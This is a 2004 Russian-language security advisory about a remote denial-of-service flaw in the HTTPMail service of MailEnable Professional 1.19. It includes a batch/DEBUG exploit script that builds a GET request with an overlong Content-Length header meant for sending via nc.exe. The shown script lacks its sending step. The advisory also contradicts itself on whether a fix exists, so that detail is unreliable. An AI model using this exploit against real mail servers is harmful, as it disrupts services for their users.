Удаленный отказ в обслуживании в MailEnable Professional

Дата публикации:
03.08.2004
Всего просмотров:
925
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MailEnable Professional 1.x
Уязвимые версии: MailEnable Professional 1.19

Описание: Уязвимость в MailEnable Professional позволяет удаленному пользователю вызвать отказ в обслуживании против HTTPMail службы.

Удаленный пользователь может подключится к Webmail службе на 8080 порту и послать специально сформированный HTTP Get запрос, чтобы вызвать условия отказа в обслуживании на целевой системе.

Пример/Эксплоит:

@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp

URL производителя: http://www.mailenable.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: DOS@MEHTTPS

или введите имя

CAPTCHA